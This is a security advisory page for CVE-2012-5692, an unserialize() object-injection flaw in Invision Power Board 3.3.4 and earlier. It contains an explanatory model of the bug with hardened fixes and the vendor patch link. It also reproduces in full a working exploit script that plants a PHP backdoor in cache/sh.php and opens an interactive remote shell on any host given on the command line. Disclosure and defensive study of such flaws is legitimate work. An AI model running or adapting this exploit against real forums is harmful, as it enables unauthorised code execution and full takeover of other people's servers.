Invision Power Board <= 3.3.4 unserialize() PHP Code Execution Vulnerability
Published: 2012-10-25
Updated: 2012-11-05
Affected systems:
InvisionPower Invision Power Board <= 3.3.4
Description:
BUGTRAQ ID: 56288
CVE ID: CVE-2012-5692
Invision Power Board (IP.Board) is a forum application built on PHP and MySQL.
Invision Power Board 3.1.x, 3.2.x and 3.3.x have a security flaw in their implementation: input supplied by the user in a cookie is passed to an unserialize() call without proper validation. An attacker can send a serialized string representing an array of objects, and arbitrary PHP code is then executed through the "__destruct()" method of the "dbMain" class. The published exploit below does this with a serialized db_driver_mysql object whose use_debug_log and debug_log properties make the destructor write the board's debug log, which contains the request's query string, to cache/sh.php under the web root. That exploit requires short_open_tag to be enabled: the PHP backdoor travels in the query string of the request line, where the space after a full "<?php" tag cannot be used, so it opens with the short "<?" tag instead. The underlying object-injection flaw itself does not depend on short_open_tag.
<*Source: EgiX (n0b0d13s@gmail.com)
Links: http://www.exploit-db.com/exploits/22398/
http://osvdb.org/show/osvdb/86702
http://community.invisionpower.com/topic/371625-ipboard-31x-32x-and-33x-critical-security-update/
*>
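The mechanism in the description above, as an added example that is not IP.Board's code and not part of the original advisory: a minimal model of the bug class (an attacker-controlled cookie fed to unserialize(), and a class whose destructor writes a file), beside two hardened replacements. The class body, the function names and the log path are assumptions made for the example; only the property names obj, use_debug_log and debug_log are taken from the exploit's payload. The allowed_classes option needs PHP >= 7.0; on the PHP 5 builds IP.Board 3.x ran on, the only safe choice is the first one, never deserializing the cookie at all.

```php
<?php
// Added example, not IP.Board's own code: a minimal model of the bug class in
// this advisory (attacker-controlled cookie fed to unserialize(), destructor
// with a file-write side effect) beside two hardened replacements.
// The class body, function names and log path are assumptions; only the
// property names (obj, use_debug_log, debug_log) come from the exploit payload.

// Stand-in for a database-driver class that flushes a debug log on destruction.
class db_driver_mysql
{
    public $obj = array('use_debug_log' => 0, 'debug_log' => '');

    public function __destruct()
    {
        // With attacker-controlled properties this is a file write to a path
        // of the attacker's choosing; the request's query string lands in it.
        if (!empty($this->obj['use_debug_log']) && $this->obj['debug_log'] !== '') {
            $qs = isset($_SERVER['QUERY_STRING']) ? $_SERVER['QUERY_STRING'] : '';
            file_put_contents($this->obj['debug_log'], "debug: " . $qs . "\n", FILE_APPEND);
        }
    }
}

// VULNERABLE: the raw cookie goes straight into unserialize(), so any loaded
// (or autoloadable) class can be instantiated with arbitrary properties.
function vulnerable_member_id(array $cookies)
{
    if (!isset($cookies['member_id'])) {
        return 0;
    }
    return unserialize($cookies['member_id']);   // object injection here
}

// HARDENED (1): member_id should only ever be an integer, so never
// deserialize it; validate it as an integer instead.
function safe_member_id_int(array $cookies)
{
    if (!isset($cookies['member_id'])) {
        return 0;
    }
    $id = filter_var($cookies['member_id'], FILTER_VALIDATE_INT,
                     array('options' => array('min_range' => 0)));
    return $id === false ? 0 : $id;
}

// HARDENED (2): if structured data is unavoidable, forbid objects entirely
// (PHP >= 7.0) so no __destruct()/__wakeup() can run, and reject anything
// that still came through as __PHP_Incomplete_Class.
function contains_object($v)
{
    if (is_object($v)) {
        return true;
    }
    if (is_array($v)) {
        foreach ($v as $e) {
            if (contains_object($e)) {
                return true;
            }
        }
    }
    return false;
}

function safe_member_id_struct(array $cookies)
{
    if (!isset($cookies['member_id'])) {
        return 0;
    }
    $v = @unserialize($cookies['member_id'], array('allowed_classes' => false));
    return ($v === false || contains_object($v)) ? 0 : $v;
}

// Constructed payload with the same shape as the exploit's, but pointing the
// log at a temp file rather than the web root.
$target  = sys_get_temp_dir() . '/ipb_demo.log';
$payload = sprintf(
    'a:1:{i:0;O:15:"db_driver_mysql":1:{s:3:"obj";a:2:{s:13:"use_debug_log";i:1;s:9:"debug_log";s:%d:"%s";}}}',
    strlen($target), $target
);
$cookies = array('member_id' => $payload);

@unlink($target);
$v = vulnerable_member_id($cookies);   // the injected object is created here ...
unset($v);                             // ... and destroyed here: __destruct() writes the file
echo "vulnerable: ", file_exists($target) ? "wrote $target" : "no file written", "\n";

@unlink($target);
safe_member_id_int($cookies);          // payload is not an integer, so it is dropped
safe_member_id_struct($cookies);       // object is refused, no destructor ever runs
echo "hardened:   ", file_exists($target) ? "wrote $target" : "no file written", "\n";
```

Run it with `php example.php` from the command line; the first line reports the file written by the destructor of the injected object, the second that neither hardened reader produced one. The second hardening only neutralises magic methods during this unserialize() call: an __PHP_Incomplete_Class that is stored and later re-serialized and unserialized by code that allows classes is restored as the original class, so treat the rejected value as hostile rather than keeping it.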
Test method:
Warning
The following program (method) may be offensive in nature and is provided for security research and teaching only. Use it at your own risk!
<?php
error_reporting(0);
set_time_limit(0);
ini_set('default_socket_timeout', 5);

// Send a raw HTTP request to the target on port 80 and return the whole response
function http_send($host, $packet)
{
    if (!($sock = fsockopen($host, 80))) die("\n[-] No response from {$host}:80\n");
    fputs($sock, $packet);
    return stream_get_contents($sock);
}

print "\n+---------------------------------------------------------------------+";
print "\n| Invision Power Board <= 3.3.4 Remote Code Execution Exploit by EgiX |";
print "\n+---------------------------------------------------------------------+\n";

if ($argc < 3)
{
    print "\nUsage......: php $argv[0] <host> <path>\n";
    print "\nExample....: php $argv[0] localhost /";
    print "\nExample....: php $argv[0] localhost /ipb/\n";
    die();
}

list($host, $path) = array($argv[1], $argv[2]);

// Request 1: learn the board's cookie prefix from the Set-Cookie headers
$packet  = "GET {$path}index.php HTTP/1.0\r\n";
$packet .= "Host: {$host}\r\n";
$packet .= "Connection: close\r\n\r\n";
$_prefix = preg_match('/Cookie: (.+)session/', http_send($host, $packet), $m) ? $m[1] : '';

// Stub of the IP.Board driver class: once unserialized and destroyed on the
// server, its debug log is flushed to the attacker-chosen path under the web root
class db_driver_mysql
{
    public $obj = array('use_debug_log' => 1, 'debug_log' => 'cache/sh.php');
}

$payload = urlencode(serialize(array(new db_driver_mysql)));
// The query string is what ends up in the debug log, so it carries the backdoor;
// it uses the "<?" short tag because a space is not allowed in the request line
$phpcode = '<?error_reporting(0);print(___);passthru(base64_decode($_SERVER[HTTP_CMD]));die;?>';

// Request 2: the injected object in the member_id cookie writes cache/sh.php
$packet  = "GET {$path}index.php?{$phpcode} HTTP/1.0\r\n";
$packet .= "Host: {$host}\r\n";
$packet .= "Cookie: {$_prefix}member_id={$payload}\r\n";
$packet .= "Connection: close\r\n\r\n";
http_send($host, $packet);

// Request template: drive the dropped shell through the Cmd header (base64 of the command)
$packet  = "GET {$path}cache/sh.php HTTP/1.0\r\n";
$packet .= "Host: {$host}\r\n";
$packet .= "Cmd: %s\r\n";
$packet .= "Connection: close\r\n\r\n";

// If the backdoor source comes back unparsed, short tags are off and the shell cannot run
if (preg_match('/<\?error/', http_send($host, $packet))) die("\n[-] short_open_tag disabled!\n");

while (1)
{
    print "\nipb-shell# ";
    if (($cmd = trim(fgets(STDIN))) == "exit") break;
    $response = http_send($host, sprintf($packet, base64_encode($cmd)));
    // Command output follows the "___" marker printed by the backdoor
    preg_match('/___(.*)/s', $response, $m) ? print $m[1] : die("\n[-] Exploit failed!\n");
}
Recommendation:
Vendor patch:
Invision PS
-----------
Invision PS has released a security advisory (371625-ipboard-31x-32x-and-33x-critical-security-update) together with the corresponding patch:
371625-ipboard-31x-32x-and-33x-critical-security-update: IP.Board 3.1.x, 3.2.x and 3.3.x Critical Security Update
Link: http://community.invisionpower.com/topic/371625-ipboard-31x-32x-and-33x-critical-security-update/